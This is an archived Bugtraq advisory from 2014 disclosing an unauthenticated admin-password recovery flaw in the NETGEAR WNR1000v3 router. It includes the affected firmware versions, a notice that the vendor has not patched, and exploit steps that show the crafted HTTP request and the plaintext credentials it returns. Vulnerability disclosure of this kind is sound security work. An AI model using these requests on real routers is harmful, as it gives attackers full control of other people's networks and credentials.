lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201401120110.s0C1Alik024880@sf01web3.securityfocus.com>
Date: Sun, 12 Jan 2014 01:10:47 GMT
From: c1ph04mail@...il.com
To: bugtraq@...urityfocus.com
Subject: NETGEAR WNR1000v3 Password Recovery Vulnerability

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability.

Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).

Tested Device Model: Netgear N150 WNR1000v3

Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and V1.0.2.62_60.0.87

Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network) firewall rule and port forwarding manipulation, etc.

Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in June of 2013, however they have not yet issued a patch.

Other Notes: This vulnerability remains exploitable when the password recovery feature of the router is disabled.

Overview:

The password recovery mechanism appears to be designed to work as follows:

1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number

2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions

3.) If the user answers the secret questions correctly, the router username and password is displayed


The problem: The implementation of this password recovery method has issues...lots of issues


Vulnerability and Exploit Details:

1.) Access the router login through a web browser: http://192.168.1.1

2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter):

--------------------------------------------------

HTTP/1.0 401 Unauthorized

WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"

Content-type: text/html
 
<html>
 
<head>
 
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
 
<title>401 Unauthorized</title></head>
 
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
 
<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>
 
</html>
--------------------------------------------------
 
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
 
-------------------------------------------------------------------------------------------------
 
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
 
Accept: text/html, application/xhtml+xml, */*
 
Accept-Language: en-US
 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
 
Content-Type: application/x-www-form-urlencoded
 
Accept-Encoding: gzip, deflate
 
Host: 192.168.1.1
 
Content-Length: 35
 
Connection: Keep-Alive
 
Pragma: no-cache

--------------------------------------------------
The username and (plaintext) password are returned in the response (truncated for brevity):
--------------------------------------------------
..
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 </tr>
 <tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
 </tr>
..
--------------------------------------------------

Additional details and proof-of-concept exploit can be found here: 

http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ